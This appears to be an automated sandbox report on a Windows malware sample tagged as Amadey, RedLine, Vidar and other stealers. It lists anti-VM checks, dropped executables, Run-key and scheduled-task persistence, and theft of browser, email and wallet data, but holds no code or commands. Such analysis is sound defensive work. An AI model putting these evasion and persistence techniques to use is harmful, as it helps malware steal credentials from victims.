Malware Analysis Report

2025-04-03 09:22

Sample ID 250305-ca4v1avqw5
Target 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
SHA256 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
Tags
amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8

Threat Level: Known bad

The file 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8 was found to be: Known bad.

Malicious Activity Summary

amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan

Detect Vidar Stealer

Systembc family

Vidar

Vidar family

Amadey

Detects SvcStealer Payload

RedLine

SvcStealer, Diamotrix

RedLine payload

SystemBC

Amadey family

Svcstealer family

Redline family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks BIOS information in registry

.NET Reactor proctector

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Identifies Wine through registry keys

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Browser Information Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Detects Pyinstaller

Checks processor information in registry

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 01:53

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 01:53

Reported

2025-03-05 01:55

Platform

win10v2004-20250217-en

Max time kernel

116s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\wtvfpcb\hijexpw.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\wtvfpcb\hijexpw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\wtvfpcb\hijexpw.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097250101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DC8.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097320101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\wtvfpcb\hijexpw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097350101\bPDDW9F.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\ProgramData\wtvfpcb\hijexpw.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bbddfcedddebbbaec = "\"C:\\ProgramData\\bbddfcedddebbbaec.exe\"" C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bbddfcedddebbbaec = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10097280101\\4klgwMz.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bbddfcedddebbbaec = "\"C:\\ProgramData\\bbddfcedddebbbaec.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0e5104c14f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10096480101\\0e5104c14f.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10096490121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\wtvfpcb\hijexpw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{113B0A22-EEEA-4B92-812A-F336BDF9854D}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{07115CE4-758F-4C61-84E1-CC2DC01C0B27}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097330101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097340101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\N6YVFSSDRIS5FIK8ZBE0ZI9JZ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe N/A
